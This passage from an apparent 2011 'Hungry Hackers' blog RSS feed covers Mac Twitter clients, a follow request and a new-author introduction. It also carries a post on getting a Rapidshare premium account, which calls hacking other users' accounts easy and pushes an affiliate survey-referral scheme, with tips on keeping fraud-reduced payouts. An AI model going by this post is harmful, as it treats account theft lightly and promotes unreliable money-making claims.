<p style="text-align: justify;">This really sophisticated <a href="http://nambu.com/" target="_blank">Mac app</a> should be more than enough for any and all of your Twitter needs. You’ve got access to your followers and friends, custom groups, search (integrated with FriendFeed<a rel="http://www.blippr.com/apps/336656-FriendFeed.whtml" href="http://www.blippr.com/apps/336656-FriendFeed" target="_blank"> </a> and One Riot), trends, tr.im and pic.im integration, multiple accounts, Ping<a rel="http://www.blippr.com/apps/490170-Ping.whtml" href="http://www.blippr.com/apps/490170-Ping" target="_blank"> </a>.fm integration, filters, and three view options for a one or many column view of tweets.</p>
<h3><strong>4. Sideline:</strong></h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sideline.png"><img class="size-full wp-image-1887    aligncenter" title="sideline" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sideline.png" alt="" width="550" height="438" /></a></p>
<p style="text-align: justify;"><a href="http://sideline.yahoo.com/" target="_blank">Sideline</a> is just a search and trending topic app from Yahoo, but it does a darn good job at satisfying those specific needs. You can view current Twitter trends, select to see the three latest tweets or pop out as its own saved search, and create custom search groups as tabs.</p>
<p><strong>5. Skimmer:</strong></p>
<p style="text-align: center;"><strong><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/skimmer1.jpg"><img class="size-full wp-image-1890  aligncenter" title="skimmer" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/skimmer1.jpg" alt="" width="550" height="355" /></a><br />
</strong></p>
<p style="text-align: justify;">It’s hard not to love this app. Not only is it beautiful to look at it, but it also tracks your favorite social sites. <a href="http://www.fallon.com/skimmer" target="_blank">Skimmer’s</a> certainly not an application for the social media beginner, but power users of Facebook, Flickr, YouTube, Blogger, and Twitter, will appreciate the aggregation of content, filtering options, view types, and enhanced content viewing experience.</p>
<h3>6. Tweetie</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/tweetie.png"><img class="size-full wp-image-1888  aligncenter" title="tweetie" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/tweetie.png" alt="" width="420" height="230" /></a></p>
<p style="text-align: justify;">A full-featured Twitter client which is available in free ad supported and ad-free versions.  This Desktop app lets you view not only the tweets but also the entire conversation history leading to that tweet. It provides you with an independent compose windows that stay out of your way until you need them. Tweetie for Mac also has search trends to let you find out the hottest trend in Twitter. Other features include threaded DMs, user details, torn off search, bookmarklet, and preferences.</p>
<h3>7. Twibble Desktop</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twibble.jpg"><img class="size-full wp-image-1893  aligncenter" title="Twibble" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twibble.jpg" alt="" width="260" height="195" /></a></p>
<p style="text-align: justify;"><a href="http://www.twibble.de/twibble-desktop/" target="_blank">Twibble</a> is a bit of a riddle. It’s not a bad app when it comes to feature set, but it’s also not the most intuitive. You can manage multiple accounts, but all tweets are merged together in one stream. You can reply, DM, fav, RT, and copy tweets, but you’ll have to hover over the tweet to even know those behaviors are possible. You can also use keyboard shortcuts, filter your tweets for keywords, or conduct searches that open up in new windows, but Twibble just doesn’t seem to flow as easily as we’d like it to.</p>
<h3>8. Twitterific</h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/twitterrific.jpg"><img class="size-full wp-image-1891  aligncenter" title="twitterrific" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/twitterrific.jpg" alt="" width="435" height="346" /></a></p>
<p style="text-align: justify;">Lets you both read and publish posts or “tweets”  using a clean and concise  user interface designed to take up a minimum of real estate on your Mac’s desktop. The app shows a scrolling list of  the latest tweets from your friends, or public feeds. Its features include multiple Twitter account support, auto refreshing, inline display of replies and DMs, shows no. of unread tweets, quickly delete tweets, auto show/hide new tweets, single click access to user pages and more.</p>
<h3 style="text-align: justify;"><strong>9. TwitterPod:</strong></h3>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twitter-pod.jpg"><img class="size-full wp-image-1892  aligncenter" title="Twitter pod" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Twitter-pod.jpg" alt="" width="200" height="200" /></a></p>
<p style="text-align: justify;">This app isn’t known for its sophistication or advanced Twitter functionality. <a href="http://www.apple.com/downloads/macosx/internet_utilities/twitterpod.html" target="_blank">TwitterPod</a> is a basic single column Twitter app with an inline browser and the ability to filter for just tweets with links. Its heyday has long since passed, but original fan boys and girls may still be using this for their twittering.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1246&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/9-best-twitter-desktop-apps-for-mac.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to get your own Rapidshare Premium Account</title>
		<link>http://www.hungry-hackers.com/2011/02/how-to-get-your-own-rapidshare-premium-account.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/how-to-get-your-own-rapidshare-premium-account.html#comments</comments>
		<pubDate>Sun, 06 Feb 2011 08:57:00 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Cool Tricks]]></category>
		<category><![CDATA[Freeware]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[RapidShare Hacking]]></category>
		<category><![CDATA[Tips n Tricks]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Money]]></category>
		<category><![CDATA[Online]]></category>
		<category><![CDATA[Rapidshare]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1785</guid>
		<description><![CDATA[Hello Friends,

Everybody wants a personal Rapidshare premium account but not all can afford it. If you are one of those people who can't afford it or don't want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. But Rapidshare guys are very smart. They provide users with a feature of locking their account due to which you will need access to the email account of that victim to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hello Friends,</p>
<p style="text-align: justify;">Everybody wants a personal Rapidshare Premium account but not all can afford it. If you are one of those people who can&#8217;t afford it or don&#8217;t want to ask your parent to buy you one then there are only 2 ways of getting a Rapidshare premium account. First one is to hack a Rapidshare premium account of some other user. Hacking a Rapidshare premium account isn&#8217;t that difficult. But Rapidshare guys are very smart. They provide users with a feature of security lock due to which you will need access to the unlock code for that account to change the password of that Rapidshare account. Thus you can only use that hacked account till the owner of that account changes the password. This one seems to be a temporary solution. Second way is to earn some easy bucks online and buy your own Rapidshare account. The second way may seem difficult at first but to tell you the truth its very easy.</p>
<p style="text-align: center;"><img class="aligncenter" title="Rapidshare Premium" src="http://www.hungry-hackers.com/wp-content/uploads/2010/05/RapidShare.gif" alt="Rapidshare Premium" width="300" height="300" /></p>
<p style="text-align: justify;">Today I will show how you can earn money online and that too without much difficulty. Just follow the steps given below:</p>
<p style="text-align: justify;">1. Create a <a title="PayPal" href="https://www.paypal.com/in/mrb/pal=84BMU8PDQP6ZY" target="_blank">Paypal Premium Account( Don’t Worry its free)</a> . When asked for credit card details simply say cancel. You do not need to fill it.</p>
<p style="text-align: justify;">2. Then Go to the following link:</p>
<blockquote>
<p style="text-align: center;"><a title="A W Surveys" rel="nofollow" href="http://www.AWSurveys.com/HomeMain.cfm?RefID=hungryhacker" target="_blank">http://www.AWSurveys.com</a></p>
</blockquote>
<p style="text-align: justify;">3. On joining this website, you will get 27 USD just for writing 7 simple surveys which will take not more than 30 minutes.</p>
<p style="text-align: justify;">4. Now the only problem is that the minimum payout limit for this website is 75 USD. But you can earn 1.25 USD on referring this website to your friend.</p>
<p style="text-align: justify;">5. So you just take the referral link from this website and paste it on your facebook status. Don&#8217;t forget to mention about it benefits so that your friends register through that link.</p>
<p style="text-align: justify;">6. Suppose you have 500 friends on facebook and out of them only 10% register through your link then also you earn 62.5 USD which gets added to 27 USD that you had earned from surveys. Thus the total 89.5 USD crosses the Payout limit.</p>
<p style="text-align: justify;">7. Now you can get that money into your Paypal Account use it not only to buy your own Rapidshare premium account but also for buying other stuff online.</p>
<p style="text-align: justify;">8. That&#8217;s it. So Simple and I swear it works.</p>
<p style="text-align: justify;"><strong>Update:</strong> Some people have a compliant that Awsurveys doesn&#8217;t pay them what they have earned and that it is a SPAM. I would like to tell you that I have already used this website earlier and I had received the payment every time. I am not saying that these guys are lying about their experience with Awsurveys but there are few reasons why they may not have received the payment. The only problem with this website is that it doesn&#8217;t communicate with the user if he is violating any terms and conditions instead of that it just cancels their payments. When you request some payout from this website, they have a policy to verify if the accounts that were referred by the user are not fraudulent and they remove the amount gained from these fraudulent accounts from the total amount in your account. Sometimes the reduced amount is less than the amount redeemed by the user and their harsh policy is to cancel the whole payment without even reimbursing the remaining amount. Now you might be thinking how to avoid this? One advice i would give you is to keep atleast 20-25 USD in excess when you are redeeming the amount. In this way you are making sure that even if there were 15 accounts which the website found to be fraudulent still the total wont get below the amount requested by you. Another condition is  of the maximum amount that one can redeem in a year. A user can redeem at max 550 USD in one year if you request for payout more than that then hey will just cancel that payment without reimbursing the money in your account. I already faced the latter one which indicates that I have atleast earned upto 550 USD.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1785&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/how-to-get-your-own-rapidshare-premium-account.html/feed</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>Join us @HackingTruths on Twitter</title>
		<link>http://www.hungry-hackers.com/2011/02/join-hacking-truths-on-twitter-2.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/join-hacking-truths-on-twitter-2.html#comments</comments>
		<pubDate>Sat, 05 Feb 2011 09:41:46 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Blog Update]]></category>
		<category><![CDATA[Hacking Truths]]></category>
		<category><![CDATA[Twitter]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1780</guid>
		<description><![CDATA[<p>If you have discovered Hacking Truths just recently and are one of our 16800+ subscribers, consider following us on Twitter as well.</p><br />

<p>You’ll be notified every time there is a new post on the Hacking Truths Blog or something new is there on the internet.</p><br />

<p>Plus, we would love it if you would re-tweet the posts and discuss them, so more people get to know about us and join our community.</p> <br />

<p>Follow Hacking Truths on Twitter Now</p>
<br />
<p>Thank you!</p>]]></description>
			<content:encoded><![CDATA[<p>If you have discovered Hacking Truths just recently and are one of our 16800+ subscribers, consider<a title="Follow us on Twitter" href="http://www.twitter.com/hackingtruths" target="_blank"> following us on Twitter</a> as well.</p>
<p>You’ll be notified every time there is a new post on the Hacking Truths Blog or something new is there on the internet.</p>
<p>Plus, we would love it if you would re-tweet the posts and discuss them, so more people get to know about us and join our community.</p>
<p style="text-align: center;"><a title="Follow Hacking Truths on Twitter Now" href="http://www.twitter.com/hackingtruths" target="_blank"><img class="aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2010/01/twitter-badge-v2.png" alt="Follow Hacking Truths on Twitter Now" /></a></p>
<p>Thank you!</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1780&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/join-hacking-truths-on-twitter-2.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Introducing a New Hungry Hacker</title>
		<link>http://www.hungry-hackers.com/2011/02/introducing-a-new-hungry-hacker.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/introducing-a-new-hungry-hacker.html#comments</comments>
		<pubDate>Fri, 04 Feb 2011 03:37:49 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Blog Update]]></category>
		<category><![CDATA[Hacking News]]></category>
		<category><![CDATA[Author]]></category>
		<category><![CDATA[Blogger]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1757</guid>
		<description><![CDATA[Hello Friends,

You all might be knowing about the "Write for Hungry Hackers" program that we had started few years back. This program has always got us some great minds. This time we have got another Hacker who will teach you some amazing and hardcore hacking stuff. I would like to introduce you to Irfan Shakeel, a new author for our blog. Irfan Shakeel is an Ethical Hacker/Security Researcher.]]></description>
			<content:encoded><![CDATA[<p>Hello Friends,</p>
<p style="text-align: justify;">You all might be knowing about the &#8220;<a title="Write for Hacking Truths" href="../write-for-us" target="_blank">Write for Hungry Hackers</a>&#8221; program that we had started few years back. This program has always got us some great minds. This time we have got another Hacker who will teach you some amazing and hardcore hacking stuff. I would like to introduce you to <strong>Irfan Shakeel</strong>, a new author for our blog. Irfan Shakeel is an Ethical Hacker/Security Researcher. He is a Telecommunication engineer and he is from Pakistan. He currently runs his own blog at http://www.ehacking.net and now he will write for us.</p>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Meet-the-Author-USA-logo.png"><img class="aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/Meet-the-Author-USA-logo.png" alt="" width="300" height="300" /></a></p>
<p><strong>Irfan&#8217;s Expertise<br />
</strong></p>
<p>Irfan&#8217; s expertise include Penetration Testing. He has done a great job in the field of penetration testing. He has found some amazing loop holes in websites like Google, Facebook, Daily Motion etc. The following pic is just one of the example. If you want to read more about his endeavors you can <a title="Click Here" href="http://www.thehackernews.com/2010/12/irfan-shakeel-has-found-xss.html" target="_blank"><em>click here</em></a>.</p>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/179855_194441093900840_100000048512771_728563_2464729_n.jpg"><img class="size-full wp-image-1760  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/179855_194441093900840_100000048512771_728563_2464729_n.jpg" alt="" width="504" height="377" /></a></p>
<p>I would like to wish him luck for his journey as an author on Hungry Hackers.</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1757&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/introducing-a-new-hungry-hacker.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 1034/1224 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-10 12:58:20 -->
